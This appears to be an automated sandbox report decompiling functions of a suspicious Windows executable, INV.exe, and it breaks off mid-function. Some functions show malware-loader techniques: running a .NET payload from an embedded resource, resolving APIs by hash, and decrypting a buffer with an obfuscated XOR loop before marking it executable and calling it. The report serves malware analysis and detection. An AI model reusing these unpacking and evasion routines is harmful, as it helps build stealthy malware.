Opcode Fuzzy Hash: 56d8877799b0669b77fb8b5540cf9d49b1b70e3c8cfed34379f379e2a7dbfaaf
Instruction Fuzzy Hash: 6FE0CD3154E751EEFE14F7E0D907BCCAA545B03B21F204157F104651C3CE780600A75A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: INV.exe PID: 6640 Parent PID: 6580 INV.exeCOMMON

Executed Functions

Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}

0x0040149f
0x004014a5
0x004014a9
0x004014ec
0x004014ee
0x004014ee
0x004014b7
0x004014bb
0x004014c7
0x004014cd
0x004014d3
0x004014d8
0x004014e0
0x004014e0
0x004014d8
0x004014e6
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD

Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037

FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
ExitProcess.KERNEL32 ref: 004014EE

Strings

v4.0.30319, xrefs: 00401053

Memory Dump Source

Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
String ID: v4.0.30319
API String ID: 2372384083-3152434051
Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679

Uniqueness

Uniqueness Score: -1.00%

Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}

0x00401e22
0x00401e28

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22

Memory Dump Source

Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x004055c5
0x004055cf
0x004055d3
0x004055e4
0x004055e8
0x004055ed
0x004055f3
0x004055f8
0x004055fd
0x00405602
0x00405609
0x004055d5
0x004055d5
0x004055d5
0x00405614

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004055C9
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609

Memory Dump Source

Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD

Uniqueness

Uniqueness Score: -1.00%

Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00403e3d
0x00403e43
0x00403e49
0x00403e7b
0x00403e80
0x00403e86
0x00000000
0x00403e86
0x00403e4d
0x00403e4f
0x00403e4f
0x00403e66
0x00403e6f
0x00403e77
0x00000000
0x00000000
0x00403e57
0x00403e59
0x00000000
0x00000000
0x00403e5c
0x00403e61
0x00403e62
0x00403e64
0x00000000
0x00000000
0x00403e64
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0009E84E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0009E84E(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E0009DB06(_t28, ?str?) != 0) {
					if(E0009DB06(_t28, ?str?) != 0) {
						return E0009FA26(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0009EB14,?,00000000), ref: 0009E892
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0009EB14,?,00000000), ref: 0009E8BC

Strings

OCP, xrefs: 0009E870
ACP, xrefs: 0009E85F

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 9e090d43eea9a335327901410b945ebeb668dc7c3cf1fc4dbccec634b756ea3f
Instruction ID: 96e007b760a7e163178a3537995941557c481420d99c4008f2930669e74e9fb7
Opcode Fuzzy Hash: 9e090d43eea9a335327901410b945ebeb668dc7c3cf1fc4dbccec634b756ea3f
Instruction Fuzzy Hash: 64014C31241655AAEF60DA95DC85EEB37D8AF057A0B148426FA0CEA192EF30DD80A790

Uniqueness

Uniqueness Score: -1.00%

Function 000A7800, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E000A7800(void* __ebx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				long _v16;
				char _v18;
				short _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				short _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				intOrPtr* _t40;
				intOrPtr* _t43;
				intOrPtr* _t48;
				void* _t49;
				signed char _t50;
				intOrPtr* _t56;
				void* _t85;
				void* _t87;

				_v28 = 0x72657355;
				_v24 = 0x642e3233;
				_v20 = 0x6c6c;
				_v18 = 0;
				_v40 = 0x72637052;
				_v36 = 0x642e3474;
				_v32 = 0x6c6c;
				_v30 = 0;
				_t56 = E000A7950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8ca9ef6c);
				_t12 =  &_v28; // 0x72657355
				_v8 = E000A7950( *_t56(_t12, _t85, __esi, __ebx), 0xb4c47f55);
				_t40 = E000A7950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x5790f301);
				_t17 =  &_v28; // 0x72657355
				_t43 = E000A7950( *_t56(_t17), 0xc7e6f44f);
				 *_t43( *_t40(0));
				_t18 =  &_v40; // 0x72637052
				_t48 = E000A7950( *_t56(_t18), 0x958d1c17);
				_t49 =  *_t48(2, 0, 1, 0,  &_v12);
				_t87 = 0;
				if(_t49 != 0 && _t49 == 0x57) {
					_t50 = 0;
					do {
						_t20 = 0xaf0d0 + _t50; // 0xcbf195bd
						asm("rol dl, 0x2");
						asm("ror dl, 0x3");
						 *(0xaf0d0 + _t50) = (_t50 + _t50 - ((( ~( !( *_t20) ^ 0x00000097) - 0x00000027 ^ _t50) - _t50 ^ _t50) - 0x00000060 ^ _t50) ^ _t50) - 0x00000052 ^ _t50;
						_t50 = _t50 + 1;
					} while (_t50 < 0x1e05);
					VirtualProtect(0xaf0d0, 0x1e05, 0x40,  &_v16);
					_v8(0xaf0d0, 0xb0ed8, 0, 0, 0);
					return E000A7D10(_t87);
				}
				return _t49;
			}

0x000a7809
0x000a7810
0x000a7817
0x000a781d
0x000a7821
0x000a7828
0x000a782f
0x000a7835
0x000a7858
0x000a785a
0x000a786c
0x000a7889
0x000a7890
0x000a789d
0x000a78a9
0x000a78ab
0x000a78b8
0x000a78cb
0x000a78cd
0x000a78d2
0x000a78d9
0x000a78e0
0x000a78e0
0x000a78ec
0x000a78f4
0x000a790e
0x000a7914
0x000a7915
0x000a792c
0x000a7942
0x00000000
0x000a7945
0x000a794d

APIs

VirtualProtect.KERNEL32(000AF0D0,00001E05,00000040,?), ref: 000A792C

Strings

Rpcrt4.dllUser32.dll, xrefs: 000A78AB, 000A78AE
User32.dll, xrefs: 000A785A, 000A785D

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID: Rpcrt4.dllUser32.dll$User32.dll
API String ID: 544645111-2494872352
Opcode ID: 3df0d46d33faee90278da1c67bcf092c3b75d0b5e95befca04789dbe411d74e0
Instruction ID: c645febcc1c4fa339ab73d52abe98ee413c11a42876f0d5ad8ead3854cd73bf0
Opcode Fuzzy Hash: 3df0d46d33faee90278da1c67bcf092c3b75d0b5e95befca04789dbe411d74e0
Instruction Fuzzy Hash: C431B171A402059FDB01DBF8CC8AFEFB7E5EF4A710F1044A5E609AB2A2DA75D9088754

Uniqueness

Uniqueness Score: -1.00%

Function 00404A29, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00404A29(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v28;
				signed int _v32;
				WCHAR* _v36;
				signed int _v48;
				intOrPtr _v556;
				intOrPtr _v558;
				struct _WIN32_FIND_DATAW _v604;
				intOrPtr* _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr _v644;
				intOrPtr _v648;
				void* __edi;
				signed int _t40;
				signed int _t45;
				signed int _t48;
				signed int _t50;
				signed int _t51;
				signed char _t53;
				signed int _t62;
				void* _t64;
				union _FINDEX_INFO_LEVELS _t66;
				union _FINDEX_INFO_LEVELS _t67;
				signed int _t70;
				intOrPtr* _t71;
				signed int _t74;
				void* _t80;
				void* _t82;
				signed int _t83;
				void* _t87;
				WCHAR* _t88;
				intOrPtr* _t92;
				intOrPtr _t95;
				void* _t97;
				signed int _t98;
				intOrPtr* _t102;
				signed int _t105;
				void* _t108;
				intOrPtr _t109;
				void* _t110;
				void* _t112;
				void* _t113;
				signed int _t115;
				void* _t116;
				union _FINDEX_INFO_LEVELS _t117;
				void* _t121;
				void* _t122;
				void* _t123;
				signed int _t124;
				void* _t125;
				signed int _t130;
				void* _t131;
				signed int _t132;
				void* _t133;
				void* _t134;

				_push(__ecx);
				_t92 = _a4;
				_t2 = _t92 + 2; // 0x2
				_t108 = _t2;
				do {
					_t40 =  *_t92;
					_t92 = _t92 + 2;
				} while (_t40 != 0);
				_t115 = _a12;
				_t95 = (_t92 - _t108 >> 1) + 1;
				_v8 = _t95;
				if(_t95 <= (_t40 | 0xffffffff) - _t115) {
					_t5 = _t115 + 1; // 0x1
					_t87 = _t5 + _t95;
					_t122 = E00403ECE(_t95, _t87, 2);
					_t97 = _t121;
					__eflags = _t115;
					if(_t115 == 0) {
						L6:
						_push(_v8);
						_t87 = _t87 - _t115;
						_t45 = E004047AD(_t97, _t122 + _t115 * 2, _t87, _a4);
						_t132 = _t131 + 0x10;
						__eflags = _t45;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t80 = E00404CA2(_a16, __eflags, _t122);
							E00403E03(0);
							_t82 = _t80;
							goto L8;
						}
					} else {
						_push(_t115);
						_t83 = E004047AD(_t97, _t122, _t87, _a8);
						_t132 = _t131 + 0x10;
						__eflags = _t83;
						if(_t83 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00404649();
							asm("int3");
							_t130 = _t132;
							_t133 = _t132 - 0x260;
							_t48 =  *0x412014; // 0x2327c9ba
							_v48 = _t48 ^ _t130;
							_t109 = _v28;
							_t98 = _v32;
							_push(_t87);
							_t88 = _v36;
							_push(_t122);
							_push(_t115);
							_t123 = 0x5c;
							_v644 = _t109;
							_v648 = 0x2f;
							_t116 = 0x3a;
							while(1) {
								__eflags = _t98 - _t88;
								if(_t98 == _t88) {
									break;
								}
								_t50 =  *_t98 & 0x0000ffff;
								__eflags = _t50 - _v612;
								if(_t50 != _v612) {
									__eflags = _t50 - _t123;
									if(_t50 != _t123) {
										__eflags = _t50 - _t116;
										if(_t50 != _t116) {
											_t98 = _t98 - 2;
											__eflags = _t98;
											continue;
										}
									}
								}
								break;
							}
							_t124 =  *_t98 & 0x0000ffff;
							__eflags = _t124 - _t116;
							if(_t124 != _t116) {
								L19:
								_t51 = _t124;
								_t117 = 0;
								_t110 = 0x2f;
								__eflags = _t51 - _t110;
								if(_t51 == _t110) {
									L23:
									_t53 = 1;
									__eflags = 1;
								} else {
									_t112 = 0x5c;
									__eflags = _t51 - _t112;
									if(_t51 == _t112) {
										goto L23;
									} else {
										_t113 = 0x3a;
										__eflags = _t51 - _t113;
										if(_t51 == _t113) {
											goto L23;
										} else {
											_t53 = 0;
										}
									}
								}
								_t101 = (_t98 - _t88 >> 1) + 1;
								asm("sbb eax, eax");
								_v612 =  ~(_t53 & 0x000000ff) & (_t98 - _t88 >> 0x00000001) + 0x00000001;
								E00402460(_t117,  &_v604, _t117, 0x250);
								_t134 = _t133 + 0xc;
								_t125 = FindFirstFileExW(_t88, _t117,  &_v604, _t117, _t117, _t117);
								__eflags = _t125 - 0xffffffff;
								if(_t125 != 0xffffffff) {
									_t102 = _v608;
									_t62 =  *((intOrPtr*)(_t102 + 4)) -  *_t102;
									__eflags = _t62;
									_v616 = _t62 >> 2;
									_t64 = 0x2e;
									do {
										__eflags = _v604.cFileName - _t64;
										if(_v604.cFileName != _t64) {
											L36:
											_push(_t102);
											_t66 = E00404A29(_t102,  &(_v604.cFileName), _t88, _v612);
											_t134 = _t134 + 0x10;
											__eflags = _t66;
											if(_t66 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											__eflags = _v558 - _t117;
											if(_v558 == _t117) {
												goto L37;
											} else {
												__eflags = _v558 - _t64;
												if(_v558 != _t64) {
													goto L36;
												} else {
													__eflags = _v556 - _t117;
													if(_v556 == _t117) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t70 = FindNextFileW(_t125,  &_v604);
										_t102 = _v608;
										__eflags = _t70;
										_t64 = 0x2e;
									} while (_t70 != 0);
									_t71 = _t102;
									_t105 = _v616;
									_t111 =  *_t71;
									_t74 =  *((intOrPtr*)(_t71 + 4)) -  *_t71 >> 2;
									__eflags = _t105 - _t74;
									if(_t105 != _t74) {
										E004074E0(_t111 + _t105 * 4, _t74 - _t105, 4, E00404844);
									}
								} else {
									_push(_v608);
									_t66 = E00404A29(_t101, _t88, _t117, _t117);
									L26:
									_t117 = _t66;
								}
								__eflags = _t125 - 0xffffffff;
								if(_t125 != 0xffffffff) {
									FindClose(_t125);
								}
								_t67 = _t117;
							} else {
								__eflags = _t98 -  &(_t88[1]);
								if(_t98 ==  &(_t88[1])) {
									goto L19;
								} else {
									_push(_t109);
									_t67 = E00404A29(_t98, _t88, 0, 0);
								}
							}
							__eflags = _v12 ^ _t130;
							E004018CC();
							return _t67;
						} else {
							goto L6;
						}
					}
				} else {
					_t82 = 0xc;
					L8:
					return _t82;
				}
				L40:
			}

0x00404a2e
0x00404a2f
0x00404a36
0x00404a36
0x00404a39
0x00404a39
0x00404a3c
0x00404a3f
0x00404a44
0x00404a4e
0x00404a51
0x00404a56
0x00404a5e
0x00404a61
0x00404a6b
0x00404a6e
0x00404a6f
0x00404a71
0x00404a85
0x00404a85
0x00404a88
0x00404a92
0x00404a97
0x00404a9a
0x00404a9c
0x00000000
0x00404a9e
0x00404aa2
0x00404aab
0x00404ab1
0x00000000
0x00404ab3
0x00404a73
0x00404a73
0x00404a79
0x00404a7e
0x00404a81
0x00404a83
0x00404aba
0x00404abc
0x00404abd
0x00404abe
0x00404abf
0x00404ac0
0x00404ac1
0x00404ac6
0x00404aca
0x00404acc
0x00404ad2
0x00404ad9
0x00404adc
0x00404adf
0x00404ae2
0x00404ae3
0x00404ae6
0x00404ae7
0x00404aea
0x00404aed
0x00404af3
0x00404afd
0x00404b19
0x00404b19
0x00404b1b
0x00000000
0x00000000
0x00404b00
0x00404b03
0x00404b0a
0x00404b0c
0x00404b0f
0x00404b11
0x00404b14
0x00404b16
0x00404b16
0x00000000
0x00404b16
0x00404b14
0x00404b0f
0x00000000
0x00404b0a
0x00404b1d
0x00404b20
0x00404b23
0x00404b3f
0x00404b41
0x00404b43
0x00404b45
0x00404b46
0x00404b49
0x00404b5f
0x00404b61
0x00404b61
0x00404b4b
0x00404b4d
0x00404b4e
0x00404b51
0x00000000
0x00404b53
0x00404b55
0x00404b56
0x00404b59
0x00000000
0x00404b5b
0x00404b5b
0x00404b5b
0x00404b59
0x00404b51
0x00404b69
0x00404b71
0x00404b75
0x00404b83
0x00404b88
0x00404b9d
0x00404b9f
0x00404ba2
0x00404bd7
0x00404be2
0x00404be2
0x00404be7
0x00404bed
0x00404bee
0x00404bee
0x00404bf5
0x00404c12
0x00404c12
0x00404c21
0x00404c26
0x00404c29
0x00404c2b
0x00000000
0x00000000
0x00000000
0x00000000
0x00404bf7
0x00404bf7
0x00404bfe
0x00000000
0x00404c00
0x00404c00
0x00404c07
0x00000000
0x00404c09
0x00404c09
0x00404c10
0x00000000
0x00000000
0x00000000
0x00000000
0x00404c10
0x00404c07
0x00404bfe
0x00000000
0x00404c2d
0x00404c35
0x00404c3b
0x00404c41
0x00404c45
0x00404c45
0x00404c48
0x00404c4a
0x00404c50
0x00404c57
0x00404c5a
0x00404c5c
0x00404c70
0x00404c75
0x00404ba4
0x00404baa
0x00404bae
0x00404bb6
0x00404bb6
0x00404bb6
0x00404bb8
0x00404bbb
0x00404bbe
0x00404bbe
0x00404bc4
0x00404b25
0x00404b28
0x00404b2a
0x00000000
0x00404b2c
0x00404b2c
0x00404b32
0x00404b37
0x00404b2a
0x00404bcb
0x00404bce
0x00404bd6
0x00000000
0x00000000
0x00000000
0x00404a83
0x00404a58
0x00404a5a
0x00404ab4
0x00404ab9
0x00404ab9
0x00000000

Strings

/, xrefs: 00404AF3

Memory Dump Source

Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 238c64b91dc00fc8aa7441f00327e0ccbbd6587d23c937c2b2e4721a264c2311
Instruction ID: ba1068fc9c078a1ad814dd17ce5e53bd1395a2ce151ae24c2f61dc23761eb13f
Opcode Fuzzy Hash: 238c64b91dc00fc8aa7441f00327e0ccbbd6587d23c937c2b2e4721a264c2311
Instruction Fuzzy Hash: 7C411AB16002196ACB249FB9DC49EBB77B8EBC4714F50427AFA05E72C0E674DD41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00098E85, Relevance: 19.6, APIs: 13, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00098E85(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E000932EE(8, 1);
					_t48 = _t42;
					if(_t42 != 0) {
						_t12 = E000932EE(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E000932EE(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E0009899A( *_t42, 0xae2e8);
								_t15 = E00099285(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E000932B6();
									E0009363B( *_t42);
									E000934E1( *_t42);
									E000932B6(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E00093D75(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E000932B6( *_t42);
							E000932B6(_t42);
							L8:
							goto L3;
						}
						E000932B6(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00094196(_t48))) = 0xc;
					goto L4;
				}
			}

APIs

__calloc_crt.LIBCMT ref: 00098E9C

Part of subcall function 000932EE: __calloc_impl.LIBCMT ref: 000932FD

__calloc_crt.LIBCMT ref: 00098EC0
_free.LIBCMT ref: 00098ECE
__calloc_crt.LIBCMT ref: 00098EDC
_free.LIBCMT ref: 00098EEC
_free.LIBCMT ref: 00098EF2
__copytlocinfo_nolock.LIBCMT ref: 00098F01
__wsetlocale_nolock.LIBCMT ref: 00098F0E
__setmbcp_nolock.LIBCMT ref: 00098F22
_free.LIBCMT ref: 00098F30
___removelocaleref.LIBCMT ref: 00098F37
___freetlocinfo.LIBCMT ref: 00098F3E
_free.LIBCMT ref: 00098F44

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
String ID:
API String ID: 1503006713-0
Opcode ID: cfa6a1b8d3433a1847bc266781531af2080a79cd1a38b141ccd30028954bf8bc
Instruction ID: b97cb3ffaf5d7643bf12991928e3b030b4792723ad36ee483a36947f184643f8
Opcode Fuzzy Hash: cfa6a1b8d3433a1847bc266781531af2080a79cd1a38b141ccd30028954bf8bc
Instruction Fuzzy Hash: E221A835104611EAEF717F65DC12E9BBBE5DF43750B108429F448592A3EF328910FB55

Uniqueness

Uniqueness Score: -1.00%

Function 00098F5C, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00098F5C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E0009551B(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00094112(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0xacf88);
					E000927F0(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E000915FE();
						_v36 = _t88;
						E000936DB(0, _t80, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E000932EE(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E00093117(0xc);
							_v8 = 1;
							E0009899A(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E000990D1();
							_t66 = E00099285(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E0009363B(_t83);
								_t43 = E000934E1(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E0009DB06(_a8, 0xae17c);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0xf0a44 = 1;
									}
								}
								E00093117(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E0009375B(_t25, _t83);
								E0009363B(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0xaecf4 & 0x00000001;
									if(( *0xaecf4 & 0x00000001) == 0) {
